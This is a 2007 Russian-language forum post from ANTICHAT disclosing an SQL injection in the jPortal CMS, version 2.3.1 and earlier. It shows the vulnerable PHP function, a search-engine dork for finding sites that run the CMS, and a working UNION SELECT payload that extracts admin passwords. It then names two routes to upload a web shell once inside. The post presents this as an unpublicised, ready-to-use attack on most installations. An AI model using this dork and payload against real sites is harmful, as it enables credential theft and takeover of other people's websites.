HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости > Веб-уязвимости
   
 
 
Опции темы Поиск в этой теме Опции просмотра

JPoprtal 2.3.1 и ниже SQL иньекция.
  #1  
Старый 09.11.2007, 15:43
Alexsize
Fail
Регистрация: 17.09.2005
Сообщений: 2,242
Провел на форуме:
9089375

Репутация: 4268


По умолчанию JPoprtal 2.3.1 и ниже SQL иньекция.

Популярная в Польше CMS.
Я не стану описывать все скули что были найдены в этой CMS, некоторые есть и в паблике. Эта уязвимость наиболее "удобна" и нигде не засвечена.
Уязвимо большинство сайтов, все версии. На официальном сайте просто защита от "хакеров", но и он уязвим.

Уязвимый код:

PHP код:
function topic_name($a
{    
global 
$topic_tbl;
$query "SELECT * FROM $topic_tbl WHERE id=$a";
$result mysql_query($query);  
$r mysql_fetch_array($result);    
return 
'<a href="articles.php?topic='.$a.'" class="t_main">'.$r['title'].'</a>';  

Дорк:intext:"jPORTAL 2" & inurl:"articles.php?topic="

Код:
articles.php?topic=-3+union+select+1,pass,3,4,5+from+admins/
В более старых версиях jp_admins. Также есть таблица users или jp_users.

Шелл заливать двумя способами: Аплоад файлов без фильтра или блоки, позволяющие вставлять php код.
__________________
...

Последний раз редактировалось Alexsize; 09.11.2007 в 15:50..
 
Ответить с цитированием
 





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ